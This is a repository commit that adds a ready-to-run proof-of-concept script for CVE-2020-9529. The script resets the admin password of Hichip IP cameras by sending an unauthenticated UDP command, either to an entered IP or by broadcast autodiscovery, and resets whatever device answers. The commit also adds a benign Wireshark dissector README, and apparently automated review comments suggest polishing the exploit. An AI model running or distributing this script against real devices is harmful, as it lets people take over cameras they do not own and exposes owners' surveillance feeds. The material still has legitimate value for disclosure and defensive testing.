added p2p dissector and hichip pw reset script
pmarrapese committed Aug 1, 2020
0 parents commit 37a6d7c
Showing 5 changed files with 696 additions and 0 deletions.
11 changes: 11 additions & 0 deletions exploits/cve-2020-9529/README.md
@@ -0,0 +1,11 @@
# Hichip IP Camera Admin Password Reset

PoC for [CVE-2020-9529](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9529) to locally reset the password of cameras manufactured by Shenzhen Hichip Vision Technology.

## Prerequisites

Requires `socat`

## Usage

Invoke with `./reset.sh` and enter target device IP (or press enter for autodiscovery)
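
Review bot: The Prerequisites and Usage sections under-document what the script does: only `socat` is listed although `reset.sh` has a bash shebang and uses `[[ ... ]]`, and "press enter for autodiscovery" does not say that this sends a UDP broadcast to `255.255.255.255` on port 12222 and then resets whichever device answers. Suggest listing bash, describing the autodiscovery traffic, and stating what state the admin account is left in after the reset, so that someone running it on their own camera knows what to expect and what to reconfigure afterwards. "Locally" in the summary line would also read more clearly as "from the same network segment" if that is what is meant.
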
41 changes: 41 additions & 0 deletions exploits/cve-2020-9529/reset.sh
@@ -0,0 +1,41 @@
#!/bin/bash
#
# Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon.com>
# All rights reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
# SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.

pw_reset() {
echo [*] Searching for device...
dev_ip=${1:-'255.255.255.255'}
response=$(echo -ne 'SEARCH * HDS/1.0\r\nCSeq:1\r\nClient-ID:bogus\r\n\r\n' | socat - UDP-DATAGRAM:$dev_ip:12222,broadcast,sourceport=12222 | tr -d '\r')
dev_id=$(echo "$response" | grep Device-ID= | cut -d = -f 2)
dev_ip=$(echo "$response" | grep IP= | cut -d = -f 2)
#echo "$response"

if [[ -z $dev_id ]]; then
echo [*] No device found.
exit 1
fi

echo [*] Resetting admin password of device at $dev_ip...
response=$(echo -ne 'CMD * HDS/1.0\r\nCSeq:1\r\nClient-ID:bogus\r\nDevice-ID:'$dev_id'\r\nContent-Length:23\r\n\r\nusrpwd set -resetpwd on' | socat - UDP-DATAGRAM:$dev_ip:12222,broadcast,sourceport=12222 | tr -d '\r')
if [[ -z $response ]]; then
echo [*] No response received, device may not be vulnerable.
exit 1
fi

echo [*] Response received!
echo "$response"
}

echo '[*] Hichip IP Camera Admin Password Reset (CVE-2020-9529)'
echo '[*] Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon.com>'
echo -n 'Enter device IP (or press enter for autodiscovery): '
read dev_ip
pw_reset $dev_ip
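
Review bot: In `pw_reset`, nothing sits between discovery and the `CMD` request, so with the broadcast default (`dev_ip=${1:-'255.255.255.255'}`) the reset goes to whatever answered the `SEARCH`, and if more than one device answers, `dev_id` and `dev_ip` each hold several lines that are spliced into the `Device-ID:` header and the socat address. Suggest taking only the first match, printing the discovered Device-ID and IP, and asking for confirmation before the reset is sent. Also quote the expansions (`"$dev_ip"`, `"$dev_id"`, and the `echo [*] ...` strings, which the shell treats as a glob pattern) and use `read -r`, since the typed value is passed straight into the socat address, where a comma would be parsed as additional address options.
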
11 changes: 11 additions & 0 deletions p2p/dissector/README.md
@@ -0,0 +1,11 @@
# P2P Wireshark Dissector

Dissector for the "PPPP" protocol, as used by CS2 Network P2P and Shenzhen Yunni iLnkP2P.

## Installation

1. Download the appropriate version of the [Wireshark Generic Dissector](http://wsgd.free.fr/download.html) plugin for your version of Wireshark
2. Copy `generic.dll` to the desired plugin directory
(see [WSGD installation](http://wsgd.free.fr/installation.html), e.g. `C:\Users\<username>\AppData\Roaming\Wireshark\plugins\3.2\epan`)
3. Copy `pppp.wsgd` (protocol file) and `pppp.fdesc` (data format description file) to the desired directory
(see [WSGD installation](http://wsgd.free.fr/installation.html), e.g., `C:\Users\<username>\AppData\Roaming\Wireshark\profiles`)
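
Review bot: Step 1 links the plugin download over plain `http://`, and step 2 has the reader copy the resulting `generic.dll` into Wireshark's plugin directory with no integrity check. Suggest noting how to verify the download (a published checksum, if the WSGD site provides one) or at least stating that the binary is fetched over an unauthenticated channel. The steps also name only `generic.dll` and Windows paths, so say whether other platforms are supported, and add a closing step on how to confirm in Wireshark that the dissector loaded.
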